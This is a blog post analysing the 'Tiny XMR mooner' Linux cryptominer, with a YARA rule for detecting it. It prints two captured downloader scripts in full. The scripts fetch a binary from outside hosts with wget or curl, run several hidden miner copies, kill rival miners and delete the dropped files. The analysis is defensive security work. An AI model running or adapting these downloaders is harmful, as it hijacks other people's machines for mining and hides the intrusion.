xorl %eax, %eax

The “Tiny XMR mooner” Linux cryptominer malware

leave a comment »

A few days ago I posted a blog post about a cryptominer that is becoming very popular. Yesterday I had a look at two new samples (this and this) which are slightly different. Here is the downloader of the first one.

#!/bin/sh
( wget -qO - http://37.187.107.139/.x/xmrt.priv > /tmp/x ) || ( curl http://37.187.107.139/.x/xmrt.priv > /tmp/x )
chmod +x /tmp/x
/tmp/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x /dev/shm/x
/dev/shm/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x /var/tmp/x
/var/tmp/x -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/x x
./x -o 206.253.164.158:443 > /dev/null 2>&1 &

sleep 30
rm -rf /tmp/x
rm -rf x
rm -rf /dev/shm/x
rm -rf /var/tmp/x

It uses a slightly more clever logic that will execute either “wget” or “curl” instead of both, and it is going to start four processes of the cryptominer from /tmp/x, /dev/shm/x, /var/tmp/x, and ./x. All of them pointing to 206.253.164.158 (privpool.mone.ro.lt) for Monero (XMR) mining. The cryptominer used was uploaded on a server at .x/xmrt.priv and it is the “Tiny XMR mooner” which is only about 500KB in size. Below you can see its command line options.

+ Tiny XMR mooner.
+
+  ./mooner -o poolurl.net:3333 -u username -p password
+
+  threads, affinity, and everything else is on automatically precalculated for you.
+
+  -o        stratum pool url
+            stratum+tcp://poolurl.net:3333 or simply poolurl.net:3333
+  -u        username or monero wallet address
+  -p        password or email/difficulty (on some pools)
+  -F        bring process to foreground, (background by default)
+  -h        halp plz. :^)
+
+  this is a rip-off of a miner. sends some hashes to the dev. if you dont want that, choose another one.
+  more hashes for you tho. Especially optimized for Xeons and Core since Nehalem.

The downloader of the second sample is a combination of the above and the one shown in my previous post. The cleanup code in the beginning is similar to the old sample but the execution is more like the one listed above. Also, it is worth noting that it is using exactly the same miner from an identically named location on a web server and uses the same Monero (XMR) server for mining. This however, starts three processes from /tmp/systemd, /dev/shm/systemd, and ./systemd as you see below.

#!/bin/sh
kill -9 `ps x | grep muhsti | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
kill -9 `ps x | grep cryptonight | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
kill -9 `ps x | grep stratum | grep -v grep | awk {'print $1'}` > /dev/null 2>&1 &
( wget -qO - http://122.255.11.221/.x/xmrt32.priv > /tmp/systemd ) || ( curl http://122.255.11.221/.x/xmrt32.priv > /tmp/systemd )
chmod +x /tmp/systemd
chmod 700 /tmp/systemd
/tmp/systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/systemd /dev/shm/systemd
/dev/shm/systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
cp /tmp/systemd systemd
./systemd -o 206.253.164.158:443 > /dev/null 2>&1 &
sleep 30
rm -rf /tmp/systemd
rm -rf systemd
rm -rf /dev/shm/systemd

The “Tiny XMR mooner” has some unique characteristics. Regarding its communication protocol, on startup it will open a socket and send a request similar to the following to the mining pool server.

{"method":"login","params":{"login":"<USERNAME>","pass":"<PASSWORD>","agent":"xmrt/0.1.2"},"id":1}

The expected response is a JSON encoded string that includes the job that the miner will start mining. You can see how this response typically looks like below.

{"jsonrpc":"2.0","result":{"job":{"blob":"<HASH OF THE JOB>","target":"<TARGET HASH>","job_id":"<UUID IF THE JOB>","time_to_live":5},"status":"OK","id":"<HASHED ID>"},"id":1,"error":null}

The miner is a 32-bit statically linked stripped ELF binary. On startup it copies itself using clone() to start a new miner background process which (for this sample) was hardcoded to always be named “sh”. The miner also checks if the “/tmp/.xmrt” file exists, this is the lock file of the miner. If it’s already there, no new process will start. Just like I did in the previous cryptominer post, here is a YARA rule that you can use to scan your system for the existence of the Monero cryptominer described here.

import "hash"
 
rule tiny_xmr_mooner_miner
{
    meta:
        author = "Anastasios Pingios (xorl)"
        description = "Linux Tiny XMR mooner miner"
        reference = "https://xorl.wordpress.com/2017/12/21/the-tiny-xml-mooner-linux-cryptominer-malware/"
        date = "21-12-2017"
        filename = "xmrt32"
        filename = "/tmp/x"
        filename = "/dev/shm/x"
        filename = "/var/tmp/x"
        filename = "/tmp/systemd"
        filename = "/dev/shm/systemd"
        filename = "/tmp/.xmrt"
 
    strings:
        $host_1 = "37.187.107.139" ascii
        $host_2 = "206.253.164.158" ascii
        $host_3 = "122.255.11.221" ascii
        $host_4 = "privpool.mone.ro.lt" ascii
        $host_5 = "donate.xmrt.pro" ascii
         
        $binary_1 = { C2 33 CF 50 35 }
        $binary_2 = { 3D DF D1 D7 66 BA CE A0 89 F0 DC CA CA BB 55 B7 2D 72 10 3E 75 }
        $binary_3 = { 77 AE A7 41 C6 0C E5 53 36 E5 F6 1A F9 53 7A DA 9A E9 }
         
    condition:
        2 of ($host*) or
        2 of ($binary*) or
        filesize < 600KB and hash.sha256(0, filesize) == "8a0d9c84cfb86dd1f8c9acab87738d2cb82106aee0d88396f6fa86265ff252dd"
}

Written by xorl

December 21, 2017 at 22:12

Posted in malware

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s